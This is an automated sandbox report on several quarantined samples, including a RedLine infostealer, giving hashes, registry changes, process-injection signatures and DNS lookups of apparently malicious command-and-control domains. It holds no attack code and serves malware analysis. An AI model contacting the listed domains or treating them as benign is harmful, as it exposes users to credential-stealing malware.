SHA512 b82aede96681b83065a446751456590acbe4b2b733268eb3e71f3a2e9a8f6c8fa5ce86f6971a5eaa0b2912b402afadf089c80bc2dbaf95ead0a22369847545ee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 40dfe99596e274ae3c5f3a457ad73b7d
SHA1 b25bfc5b652795beb2fb599d7d81abbd127fe945
SHA256 fa499d641858f01b8af704a5d73dbf44fd5d8feae394c21c1dd3c8371f513fbf
SHA512 b5f35b6e0f6e23ff816eb688f7c43d408b22855d13e07f7b00bb96e1ee6512f9f04e95b22e84a701b99a047bb029d943130ef3f2d52a6cc907c3d6d66fd6c408

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 75dfa57b5f19cfc04296aa7fe1484e21
SHA1 247e80dafb66528a97dce14a21c9ae65af83f7ce
SHA256 14d67673bd864b63aeaa194092e5de9003e317bcd104f9f3ff42b125b648dbf5
SHA512 0d800c87dff7ff9161fd84cb7aab039812d33684abb5348f6077aadafaf11055678523b28a28a034e57ea7810f0cc483b26768979013c41da1872dae67efdd50

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774330" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469EE9C1-F499-11EF-8BDE-523A95B0E536} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000b8d6714cbfb8d6b9a88c55ffa9ca7c1b7ca74c5f5231f6a934d82b324ba40d60000000000e8000000002000020000000254978225f2edd81301a33f99ca0dd1eceedfef660ccb4f7491517dbdb5efe4890000000c2b3b855db65b69f70427602066226ccec2b8a64a901a9c84aaedde9741d7860e7b1ea2057c616545560434307b2bed3152d16ad4dc9db0bf73ba6507e34dfed9d1a1aac6e43312ddae5469f8ab608a391d0e5cfc82d2d8559d092d45f6db6f7407934d37fd82cd2c71de4fb0d28db5e3fd4ae2697b822303677c87088b90d6494f5e4060d61601ffeefe07bbf1a452c40000000d5ae11363709f11f14bbff012f4d2b7ba6414292562aefe2ccaaf976242b471f57a7daaa76fa7e6a756b0ac9c63a0da001724f302a9a3a8302f6fb2aa4c8a395 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000041fa429953179746bab86700d9d5f5e700000000020000000000106600000001000020000000c2899edd856c3d8689e4ae57f42d3dc5662550e57b27b26b98a798c8141944eb000000000e8000000002000020000000ef19e0468a1a1b09c9b956d55be8c939e818bbb2cefe59a246d6b3b678008e4e20000000a7f2582121b18abb051e403301a423a2d9fde7bbc5a803cf1a5d52567f231a43400000003cd48e629cb730e4560360715de8584168c2a5662c046fe13067f0204f43d777bf65e4a3d5af7fb33553c5e97f86282ee5282cc36f435376d658a4aa1a7ca74f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 509f111ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab82E9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar837C.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7e306bb6c9f1e4f2e0d0d7e9510728f
SHA1 511b07b1e885ff75a3d088fc2b8751f4b9a4ac99
SHA256 18c0278df79292091f5f8368dc3a663b24ddc934cc8885d6f23379152788c6b8
SHA512 f75dd56d1f7c576d191ec7fb04a6491a4b8e24eb220fa704b6b529df32876feb540751e5483f1071d9b42bce5a469200023bf44be3a6dc91f06bf4574e27902a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1b36b97219f054288636ca1139c52bb0
SHA1 0ee7839d6a4123fcf0deda3339552fe050fcf8ad
SHA256 40c0cdccf968364f3b7d80cd5a31de191cc1c978708d33f3687193af3395a80b
SHA512 ee35054e8367876678e29e1994e1dc9552a37c8bb6bc9fee5d4786d3939254da2347ddfffbf13508fb32c4c0fc7c9beacd5e601f50849182c3a0dd811920b641

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 547cf652aaaf41ac6a4c02de63e04c90
SHA1 1dba9f35dbc1ef70d3b1b88ff55005dd8e4cdec2
SHA256 01ef238f5c7c77d0572e1ba31e537fa5e0db5840254ac77c4e41ca46b658264a
SHA512 7460cfa08081ffa1e4f034803507073ddedf4806e9501bc8ab6c522b5aa59d84a205abe1b55735b1c74084402da005e4d10e6e43485fa25c34984e70f9b16c23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 50a46aba9a9601c101929250f1f26109
SHA1 0d44f49792e67340000bffe7b224f8cc5210c623
SHA256 dd948bdaa467ec4f8180f2dc730ca5da9e95587b401908d0623a908b4a39b0ea
SHA512 b476bc1d5b4ed73f51ffd302013f7dbaf0ec2967c0fe7f2fd1b312a44fc735f16c4b163006a8252aba25fe2bb10a358fc6018533495f753b59d69939fbe46258

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 09e8c54ee153292fe22bfb6fc9729b5a
SHA1 7a924ae6aee4326c0b67c9bd92b70f4d3c9cf7e5
SHA256 b6527c854f0afbf5a0261b67674ec4b960f2d5dd12f415286c76b0e41c856e34
SHA512 db61dd50345ba2c49b202146949b76d7fa00315d0c00c9269586da74a4ea001b5d804199fd65e277a2620f2e59725a6d95e0a6253a65cba11587406152b5075e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 64be3f8886e60f3bd9d5afd6250f46ee
SHA1 387f939d6741050917ac4691c8547e07bb09760c
SHA256 85ea286614dc34741866afba5ebcdb05e88b197ed8ef14841c3329b0c969a4b9
SHA512 5e1191d921a12ab4054c3af5c34be3017d35241d8a24cad9d09cdc7ce20c567c64e75f5f302784c69c81db371c43b4fc4bcf5e8e3569cbe28c431365d07aeda0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ced1a7ff91fdc469e435ac9cae00c049
SHA1 538ea866922149248a0e5082efa65b33bb05fc95
SHA256 08173bd43c2133862e668734f255f1f0a2bde2faeb13b6b01acd61051d3ea8aa
SHA512 44042203c9de3e10c0b1f30c7f85ed5cf8bf9ac52150e8618543016024680f3cd44938c9e97427290dad4af383c34b82393bdb08e2d1b8dda011ef5ee190d7f1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c77253b1bc859c0100fb615ed0c8aab
SHA1 cfd1108138c35a2f1953cf206c548e27be21d6da
SHA256 dd68812d5fafb404bed83dbf80061501554138faa47adea5ecac95c51d0c86d4
SHA512 15bd3a2c67aa09c9fe92c92c0bacbe57cd517189132300d5ed8e25411dfca6917c23b0399f05e3ca6a1a4471ab66a51bfa6472d44ba909d32971b3abf78c9fd9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e739f08ae230fe6d3b00972004a7eba2
SHA1 60faa1653364ff02c5111ff324582afbe2222de9
SHA256 801f81780b91646459ca8e4bd9f9338c702b7a18a6fdb5ebcf20a3a286ff1068
SHA512 b506104a9357a1242bd66e36229577be46311ecaa78e0354812f396361fb42027ed78523a314273e4b994adc0f1a0b53207898ab9cbb713c826bca47fbb465a8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 adc49f3c3379538709f96849eeaefee6
SHA1 92baf2c6a34d21a6b018e76795627501b1c82747
SHA256 eb3abb1f2c17a730e40c79d0990e7c2d6d0ebb3fe189ce3a1881185e5742473f
SHA512 5cb7d4a972cc433d4d1d0b9cfdb2bac7948693a511498b0c5046f27ca83d7026f1c393330af13eb184b98dac61070ec068d27ac006d68ac2ea776f0b12b5ab51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 78825905998c050b4bd20fe3f7d8d7a4
SHA1 b39104dec570e65876f98bc8b258ea41c61c05e3
SHA256 47379278cd2327b0b4d69fec0f302a2abcc151374645e95c3fc8b7152011ddb9
SHA512 e13bbb0a4d5b757582e4e4b3019987c64177ab2d75b4acae796fbb42bc31449c4b5023f270451442a859909997816d37311fddc901dc956e3f4d890d901a2b2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4410fbd6728006bc547f7d8430e853f2
SHA1 7022e40484f0be73094ebfa9beff527a76ab8b9a
SHA256 1a9f75a0a4b2dbbd142a4f4bd3770be2e65d9eaf521d47c594f94cca7eded120
SHA512 6db1d415bd2a4c3b74df446a0e661017e5c6f3a8120e51d2d8c93c6082435cf81b57aba6f58553215e15a12a8cefc2a56564c93f0f068ed2d78330afb04a158a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 556f61b934c6b87cb66e0ab6684304a3
SHA1 94df2760085a510859f0901d6b3cd11c5f56428f
SHA256 c33b25b4ffce4df7d8cd592d56b4e9c136b767a386b5136f094985b13fe7ddc0
SHA512 a828dc962e514a20de6f5ee235b77f0467faf42bab7cd78a0151d56ecaaafc65fd994109232315bfd8ff8efabaa9d20fa0695e1c4c4a5d1efbbef64416a06142

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 08b8ab58f3f408a64f8ea8ded48ebf8d
SHA1 ab91461602d315d00d5c3907276e1c14f45580d8
SHA256 01801fe33eecda7541d64535fcf88dd8bfca9feccdec30bffd88b25c8c9e5cd8
SHA512 2e133ffa8aaf5333b32c24772262f96f590a51f20788315fb85c632230c81710be445ecf63cdcfb704986646ee0d97c3d46a7a55685591d127ee4024caa31808

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1103cfd33d6868f18fcb50a601dc956f
SHA1 401aef94305881df5ab05362c6db5eacd70c4f1c
SHA256 28905433938cddf95ee75e57db3b69d0baa1eaa9ac996795ad9d67151870c5e9
SHA512 b096179054b63b55a7183e9e98a79d051f9b038d2dc839359d0ff65ba02d78561cdfaa8966ded8cc9cfc4697472b75975b63ad56b154f0a6299ec32064fcefcb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e754dc3495cce45fa350582377c9759
SHA1 434f54c7bceb8c303900abcebca7c8c9eb744d0d
SHA256 421bf2a53f6689d9e65e60e14781e548adbf0db5df7d926746ce29e6932b26c0
SHA512 8456bac1e867122e1f141880a04980fab4da373eac374dfd489ebd2b19fcc031423c6d2acc4dacbc184fc80c506d95c6c09637384f99a2a00819638f31917d61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3599df05b72ab0caf353d0e241823c56
SHA1 95cd79ddc8e749a6d931395580e7e0024374c62f
SHA256 6d80f3d9e7255eae3d9d03a552fa156e6705ba25bfc377e2c41a1e98b04ab219
SHA512 a5f9b744f0e0d2ee3fb4e07e5e6aed6c8ba2e3152df608cd547f2413d8840d7ee4d8bd4c36e99851ef0ed44a19e6943d8f47b5ea56f77bdf2ecf9ea5ae78dd56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 07f62e7598a135c1b2c017d88c5ff74c
SHA1 066d10d7ce1e5c7be4be7a2b1755fa40d48aeca6
SHA256 e9dfd801b94caceefddaa8d5eddcb5893abe84a38179423b426971fff0c6a81d
SHA512 a79b7dcabe4bb327b19c4e1ee92b74df9edaa67c589cb7e12cea48360d6a8040fd4d09d2ea386c49ed48e57bd0d616b026d4b7f8d66e87b03757d9d2df2d5a11

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ba58bea72b5376879e056418be7ed38
SHA1 74373943eb26f3f6b5706013cd7c49c2ad532794
SHA256 039961a85e32484ef46d221f9e2ba431f790dcbaf4131449ff9b7ecd8692e901
SHA512 21baaf03bf6533b66ee62e2c09cfe283ef4223afba8ec1786db85dea270df73f12554e32aa60196688f2a657f1e71dadbf86c0d319081d11d0965487e65943eb

Analysis: behavioral23

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

106s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3004 -ip 3004

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 800

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp

Files

memory/3004-0-0x000000007519E000-0x000000007519F000-memory.dmp

memory/3004-1-0x0000000000920000-0x000000000097A000-memory.dmp

memory/3004-2-0x0000000005800000-0x0000000005DA4000-memory.dmp

memory/2772-4-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2772-6-0x0000000000400000-0x000000000045D000-memory.dmp

memory/3004-7-0x0000000075190000-0x0000000075940000-memory.dmp

memory/2772-8-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2772-9-0x0000000000400000-0x000000000045D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

140s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

RedLine

infostealer redline

Redline family

redline

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1800-0-0x00000230A02D0000-0x00000230A03D0000-memory.dmp

memory/1800-1-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp

memory/1800-2-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp

memory/1800-3-0x00007FF605850000-0x00007FF6059FE000-memory.dmp

memory/1800-4-0x00000230A02D0000-0x00000230A03D0000-memory.dmp

memory/1800-5-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp

memory/1800-6-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2288 set thread context of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
